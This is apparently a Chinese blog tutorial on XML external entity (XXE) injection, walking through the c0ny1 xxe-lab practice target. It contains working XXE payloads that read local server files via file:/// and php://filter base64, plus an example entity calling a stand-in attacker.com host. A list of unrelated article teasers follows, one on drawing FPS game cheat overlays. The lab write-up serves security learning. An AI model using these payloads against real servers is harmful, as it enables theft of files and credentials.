xxe漏洞

ops/2024/10/22 11:07:21/

本文仅作为学习参考使用,本文作者对任何使用本文进行渗透攻击破坏不负任何责任。

一,漏洞简介。

1,xml简述。

XML(Extensible Markup Language)是一种用于标记数据的简单易读的文本格式,主要用于存储和传输数据。它的设计初衷是为了使得数据在不同的软件之间交换变得容易。XML的核心特点包括:

  1. 结构化:XML文档由标签(<tag>…</tag>)包围的数据组成,每个元素都有明确的开始和结束标签,形成了层次结构。

  2. 自定义标记:开发者可以根据需要创建自己的标签,以描述特定的应用场景或数据类型。

  3. 可扩展性:XML允许添加新的元素和属性,使其能够适应不断变化的信息需求。

  4. 纯文本格式:XML文件可以用文本编辑器直接查看,易于理解和修改。

  5. 分离内容和结构:内容和标记分开,这使得数据独立于显示样式,便于数据转换和处理。

然而,虽然XML本身并不提供强大的数据操作功能,但通常结合XPath或XSLT等技术来处理和转换XML数据。

2,漏洞简述。

XXE全称为XML External Entity Injection,即XML外部实体注入攻击,是一种常见的Web应用程序安全漏洞。它发生在处理用户提供的XML数据时,恶意用户能够利用服务器对XML外部实体文件的解析请求,注入恶意脚本或命令,从而获取敏感信息、执行任意代码甚至控制整个系统。

攻击者通过构造特殊的XML文档,包含指向不受限制的外部实体引用(如<!ENTITY x SYSTEM "http://attacker.com/command.php">),当服务器尝试解析这个XML并加载外部实体时,就会触发远程代码执行。这种漏洞常见于那些缺乏充分验证和安全配置的XML解析库中。

二,靶场搭建。

靶场地址:https://github.com/c0ny1/xxe-labhttps://github.com/c0ny1/xxe-lab1,将其下载到phpstudy的www文件夹下,并解压。

3b4a6780ae2f4a77bd14150afc735dff.png下载好后,可以看到,内部有很多不同的压缩问文件,仅解压php版本即可。

解压后,新建网站,就可以直接使用。

30ca5f21f35c479dbd5c54c9b6d9dcb8.png使用本机ip打开后:

e7d918c4835341bd838586b59d922d92.png三,攻击测试。

1,进行抓包。

686d61704aee4f8f8f69a63e94c61f0a.png

在交互界面输入:账户为:admin;密码为:root,并抓包。

29dd01b797b54da492f7f0a5f5205ec2.png账号密码传输数据的格式是 xml,可以考虑在这里传输其他的恶意数据,因为登录口传输的既然是 xml 数据,那么后端接收的时候,肯定是 xml 解析,既能会解析,那么我们就传恶意的 xml 数据给它解析,让他执行。

2,将其发送到重放器中进行编辑。

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE XL [
<!ENTITY fl SYSTEM "file:///F:\phpstudy_pro\WWW\g.php">]>
<user><username>&fl;</username><password>asdf</password></user>

5f5ce7667612459aae021c85cb5f38a6.png

在本地新建php文件,尝试读取。

d33987da712c4bffb604b3c9077dea6c.png4351627b68ab4b7faea1ebbb6625ee18.png测试失败,此处应使用php伪协议,并使用base64进行读取。


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE XL [
<!ENTITY fl SYSTEM "php://filter/read=convert.base64-encode/resource=f:/g.txt">]>
<user><username>&fl;</username><password>asdf</password></user>

8a502e44d0a24dd59dc1588f29f6c8ad.png读取成功。

 

 


http://www.ppmy.cn/ops/103861.html

相关文章

Python实现-透视方框绘制

前言 对于FPS游戏的外挂&#xff0c;最常见的就是透视&#xff0c;而透视必然要用到方框绘制功能&#xff0c;C和易语言在这方面的教程比比皆是&#xff0c;但是Python搜出来的几乎全是用PyGame或小海龟在自身创建的窗口上绘制方框&#xff0c;然后你就会想&#xff1a;“哥们…

SCDN的优势在哪?Edge SCDN与传统SCDN有何不同?

我们经常听到的SCDN&#xff0c;即安全加速&#xff0c;是一种在传统CDN的基础上融入了安全防护功能的网络服务&#xff0c;通过在全球范围内部署多个边缘服务器&#xff0c;根据就近原则给用户调取最近节点缓存的内容&#xff0c;能够在满足用户的资源请求的同时显著减少延迟并…

第十五章 rust中进行windows系统开发

注意 本系列文章已升级、转移至我的自建站点中,本章原文为:rust中进行Windows系统开发 目录 注意一、前言二、指针三、windows四、字符串一、前言 作为系统级语言,rust可以很容易的和C++一样进行系统级编程,但实际操作后我相信你会遇到相当多的问题。 比如以本文要介绍的…

Puppet简介

Puppet是一个开源的IT基础设施自动化管理工具&#xff0c;它能够帮助系统管理员管理基础设施的整个生命周期&#xff0c;包括供应、配置、联动及报告。Puppet使用声明式配置语言来定义目标状态&#xff0c;并通过模拟、强制、报告等步骤实现自动化管理 。 ### Puppet的主要组件…

283.移动零

283.移动零 给定一个数组 nums&#xff0c;编写一个函数将所有 0 移动到数组的末尾&#xff0c;同时保持非零元素的相对顺序。 请注意 &#xff0c;必须在不复制数组的情况下原地对数组进行操作。 示例 1: 输入: nums [0,1,0,3,12] 输出: [1,3,12,0,0] 示例 2: 输入: nums …

Hive SQL 练习

1、统计每天首次登录的人数 -- 统计每天首次登录的人数 -- 步骤&#xff1a;先找出第一次登录的时间&#xff0c;再按首次登录时间分组求人数-- 方法1&#xff1a; select first_login_time, count(user_id) as cnt from (select user_id, date_formate(min(login_ts), yyyy-…

计算机毕业设计PySpark+Scrapy农产品推荐系统 农产品爬虫 农产品商城 农产品大数据 农产品数据分析可视化 PySpark Hadoop

(1)能够根据计算机软硬件知识和数学知识给出复杂工程设计的基本思路和解决方案&#xff1b;在考虑社会、健康、安全、法律、文化以及环境等因素下可对设计方案及软硬件系统等在技术、经济等方面进行评价&#xff0c;确认其可行性&#xff1b; (2)能够建立软硬件系统、应用数学、…

【数据隐私与安全】数据隐私保护与安全管理

数据隐私与安全 数据隐私保护与安全管理 引言 随着数字化时代的到来&#xff0c;数据已成为企业和个人的宝贵资产。然而&#xff0c;随着数据的重要性增加&#xff0c;数据隐私和安全问题也变得愈发突出。数据泄露、隐私侵权和网络攻击等问题频繁发生&#xff0c;使得数据隐私…